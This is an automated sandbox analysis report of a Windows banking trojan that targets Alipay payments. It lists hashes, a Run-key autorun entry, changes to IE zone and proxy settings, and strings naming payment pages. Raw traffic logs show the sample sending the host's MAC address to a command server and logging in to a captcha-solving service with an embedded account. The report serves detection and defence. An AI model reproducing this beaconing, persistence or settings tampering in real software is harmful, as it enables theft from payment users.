Trojan.GenericKD.2249578_07fd8bc3e2
Trojan.GenericKD.2249578 (B) (Emsisoft), Trojan.GenericKD.2249578 (AdAware), GenericEmailWorm.YR, TrojanFlyStudio.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 07fd8bc3e2c460e17ad8a37c2f7dcf71
SHA1: f96243e4be9968625ff1977543681821967ab1d8
SHA256: 2494356cdf0a21950b75e365f9480cede5f3a1bd3b5a760b89bb935558118223
SSDeep: 49152:KNPDqXMXmf1UGXkVaW4mxDulVXN6kPof:DcXz2kVafqulV96kPof
Size: 2383872 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: StdLib
Created at: 2015-03-15 10:03:33
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:348
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData]
"UserFilter" = "41 1F 00 00 53 08 AD BA 01 00 00 00 32 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU]
"alipay_hwnd" = "1638622"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 9F 70 B9 B5 4D F4 CA 48 79 50 12 B9 FF D9 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"EnableChromeTab" = "0"
The Trojan modifies IE settings for security zones to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| afd14de763f7c540e686afdc55281039 | c:\UUWiseHelper.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1025359 | 1028096 | 4.5629 | f7279607e8fc344535125fc61a1364a1 |
| .rdata | 1032192 | 1215612 | 1216512 | 4.25382 | d54b02a3965caadaa04bfcc027da235c |
| .data | 2248704 | 302730 | 98304 | 3.74499 | d5beb10cdb7ac993a77fef1745a94747 |
| .rsrc | 2551808 | 36416 | 36864 | 3.58565 | 2110b7b5888adc8dda4dc0f042f1526e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://174.139.10.150/update/check.php?check=1.3 | |
| hxxp://s1.uuwise.com/Api/config.aspx | |
| hxxp://lb.uudama.com/Api/VerifyAPIFile.aspx | |
| hxxp://lb.uudama.com/Api/UserLogin.aspx | |
| hxxp://lb.uudama.com/Api/UserPoint.aspx | |
| hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=3032273022523032253032133022603032461.3&gsd=303216303232302277303213303200302274 | |
| hxxp://www.api666.com/test.txt | |
| hxxp://www.api666.com/s_start.php?mac=00-0C-29-8E-22-D8 | |
| hxxp://www.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8 | |
| hxxp://www.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ | |
| hxxp://www.api666.com/update/check.php?check=1.3 | |
| 1.cn.pool.ntp.org | |
| cn.pool.ntp.org | |
| www.baidu.com | |
| 0.cn.pool.ntp.org | |
| 2.cn.pool.ntp.org | |
| 3.cn.pool.ntp.org | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Software Install Reporting via HTTP - Wise User Agent (Wise) Sometimes Malware Related
Traffic
POST /Api/VerifyAPIFile.aspx HTTP/1.1
User-Agent: VersionClient
Cache-Control: no-cache
Accept: */*
TTL: 1427902891209
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 411
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Info"
449AA4D5026EF9F69DABB21D88F3E48D5BF5C582E09500EA5EB6004963E12D064C7056FFCD9F6D4A3234818CBBD7F9BEA51ECD2143FD05AC13B22AF4A008E145D45497F0D4AA397BAD5D995D49C9FBE1F2D5A3BFF89CBB65
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 96
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=errw3c454axfofnjx0vt5i45; path=/; HttpOnly
Cache-Control: private
24664F2554DDE337A2836DF3C253569DF6F31FF43DF8EA44FC6D7F086349C98773530F
5133CD51B37DDD4C3725BB6ACB....
POST /Api/UserLogin.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902895803
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 715
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="NAME"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="PASS"
EFF0F22544B04226BABA0D48195CB738
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
53F117A35BB9FB72B8794AD99C32C670DA1CE9477251DF95C3A439EA60D907977C5D06144FA4A75A0911A2CA163286F1DBB69B9831D6966145AF8B72BC088D99A76E37DC94FA128E
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 448
Connection: keep-alive
ServerV: 10043
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=km2i1j55jei43rfrptpqqo2d; path=/; HttpOnly
Cache-Control: private
90FA3BD8B8F4C0FB5C8C0C32C99E75E8CFD80087C8E39FF35921E36C16F0E40851E736
39FB007CC68C895BF5ABC12F4C90574383EC3C2402D3D229C4D6F72DA07E1167D21E09
E155CF0AB2CAAC0B79BEF19A359F69A109126918A97FF79F775BBDC5C085FF09192A1C
143AC6D27286E214D257F494D493CA2357972114F47C30AAE3CAF1CA680A9528E9769B
368F781C150C0D4E3DF959459901F3BC40432FECDE44CBD76F905960801DB903F43EEA
5A7D4F078F66E632BA753398903170661EC6262B45B85BFB3D8F49E38632FB12FC1B83
EC57D18D8A550B505D6AC97E9A85....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902896709
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1131
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
0F9FA1A753ED4B73A5AAAFF1470CAD82
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
CFB6490440EC58A8583E7CCE45CAA1E2FF40F971D5749BFDA033170E3DECBFABE04F61FE852DD0A5BB5C8FD21537922932F6A929A2CBB8E9C849A8777BC146413DA9A57AED4B6A70C2EF34B7225167955D9A2AC387A33097DBEAA9A98E37A30061745AF70F74D6E9A107EF5ABB1C14AA8061ABD5E231927DAC73209B88E8D999D99BD62D160264101E259CE5CB006D2EFB6A9571F65D7D73273949874C7EB6893D40ABA2F0BD7E0EC04509C39CAFC3662562A4655CD99884AF04443C534A752E87AEE4CEAF5FA17EA65F8B5AEAE6B64E74D9D204637C3B39A51B4C2C42A9F9807FA744E0BC5026970F87949CBABA945796B024AE5F693B46391B82E4FDE81D3B58CD42BE323AEFFA5EAAD82EE3B539FC7CF0C7C0D4802A76
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10042
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=isbsanbcme1d0oayrfsbua45; path=/; HttpOnly
Cache-Control: private
B7C330AFD0695F577B7CF17F1949442F....
POST /Api/UserPoint.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902897100
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 1163
Host: lb.uudama.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Name"
yexingzhe
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="Pass"
85AEC333149A4BDE89478991F6BF38DB
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="INFO"
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Apr 2015 15:40:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 32
Connection: keep-alive
ServerV: 10034
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0hnlrqaqa4bquqy5fov5fb55; path=/; HttpOnly
Cache-Control: private
FBD18BEAEAB719B13CB86C11C616EDA7..
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:26 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:56 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /update/check.php?check=1.3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.api666.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
GET /test.txt HTTP/1.1
Referer: hXXp://VVV.api666.com/test.txt
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:42:11 GMT
Content-Length: 2
Content-Type: text/plain
Content-Location: hXXp://VVV.api666.com/test.txt
Last-Modified: Sat, 21 Mar 2015 09:35:57 GMT
Accept-Ranges: bytes
ETag: "f2eb806fba63d01:471cb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ok....
GET /s_start.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_start.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
no..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
POST /Api/config.aspx HTTP/1.1
User-Agent: WiseClientAPI-2.0.0.4
Version: 2.0.0.4
HASH: afd14de763f7c540e686afdc55281039
Cache-Control: no-cache
Accept: */*
TTL: 1427902888443
Content-Type: multipart/form-data; boundary=-------------aabbccddeeff007dc3d73a70130
Content-Length: 376
Host: s1.uuwise.com
Connection: Keep-Alive
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="HASH"
50FB130BCA1FFB4B2C642C8E94620915
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="SID"
2097
---------------aabbccddeeff007dc3d73a70130
Content-Disposition: form-data; name="InitTTL"
1427902888412
---------------aabbccddeeff007dc3d73a70130--
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 15:41:45 GMT
Server: Microsoft-IIS/6.0
ServerV: 10035
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ls0cgemfccjrhfnhkldqov55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
313030302C6C622E757564616D612E636F6D3A38303A3130312C7570622E7575776973
652E636F6D3A38303A3130322C7570622E7575776973652E636F6D3A38303A3130332C
7C307C39312E3230302E3135392E31333120..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
add..
GET /s_sc.php?mac=00-0C-29-8E-22-D8&client=............1.3&gsd=............ HTTP/1.1
Referer: hXXp://VVV.api666.com/s_sc.php?mac=00-0C-29-8E-22-D8&client=......1.3&gsd=......
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-Type:text/html;charset=gb2312
GET /s_getbox.php?mac=00-0C-29-8E-22-D8 HTTP/1.1
Referer: hXXp://VVV.api666.com/s_getbox.php?mac=00-0C-29-8E-22-D8
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: VVV.api666.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Apr 2015 15:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/html
----..
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
UUWiseHelper.dll
ole32.dll
user32.dll
OLEACC.DLL
kernel32.dll
wininet.dll
uu_loginA
yexingzhe|,|yexingzhe|,|[email protected]\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
VVV.baidu.com
32F1C86B-E64C-4EAF-8BC1-C142570008BC
\UUWiseHelper.dll
@.reloc
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
urlmon.dll
dbghelp.dll
gdiplus.dll
IPHLPAPI.DLL
WS2_32.dll
GetProcessHeap
GetCPInfo
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
uu_reportError
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
0(1,10141
9 9<9@9`9
:-1014,URL
:-19011,
TEAKEY
my.alipay.com
consumeprod.alipay.com
fastpaycashier.htm
ebankpay.htm
<form name="ebankPayForm" id="ebankPayForm" method="POST" action="ebankPay.htm" target="_blank">
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
hXXp://cashier.alipay.com/standard/payment/cashier.htm?orderId=
hXXp://VVV.api666.com/
hXXp://VVV.ip.cn/
SQLite format 3
CREATE TABLE tblSwitcher(key LONGVARCHAR,pattern LONGVARCHAR NOT NULL,type INTEGER NOT NULL,flag INTEGER DEFAULT 0 NOT NULL,set_time INTEGER NOT NULL,action INTEGER NOT NULL DEFAULT 1,primary key(key, pattern))5
indexsqlite_autoindex_tblSwitcher_1tblSwitcher
CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'
indexsqlite_autoindex_meta_1meta
alipay.comconsumeprod.alipay.com
alipay.commy.alipay.com
alipay.comcashierztg.alipay.com
alipay.comcashierzue.alipay.com
alipay.comcashierzth.alipay.com
alipay.comfinanceprod.alipay.com
alipay.comshenghuo.alipay.com
alipay.comVVV.alipay.com
MCPattern3.db
CtableMultiCorePatternUrlMultiCorePatternUrl
CREATE TABLE MultiCorePatternUrl (url VARCHAR(1024) default 0,client_id INTEGER default -1)
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)-
indexsqlite_autoindex_db_info_1db_info
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INT
hXXps://my.alipay.com/portal/i.htm/
hXXps://lab.alipay.com/user/navigate.htm/
hXXps://authzth.alipay.com/login/certcheck.htm/
hXXps://auth.alipay.com/login/index.htm/
hXXps://auth.alipay.com/
hXXp://VVV.baidu.com/link/
hXXp://auth.alipay.com/login/index.htm/
hXXp://auth.alipay.com/
hXXps://tbapi.alipay.com/trade/trade_payment.htm/
hXXps://cashierzue.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzue.alipay.com/preprocess/trade/tradepreprocessgw.htm/
hXXp://buyer.trade.taobao.com/trade/pay.htm/
hXXps://cashierzue.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierztg.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzui.alipay.com/standard/payment/bankcardform.htm/
hXXps://cashierzui.alipay.com/standard/gateway/ebankpay.htm/
hXXps://VVV.alipay.com/
hXXp://VVV.alipay.com/
hXXp://mse.sogou.com/app/features/feichuan.h
CREATE TABLE MultiCorePatternUrl (url VARCHA
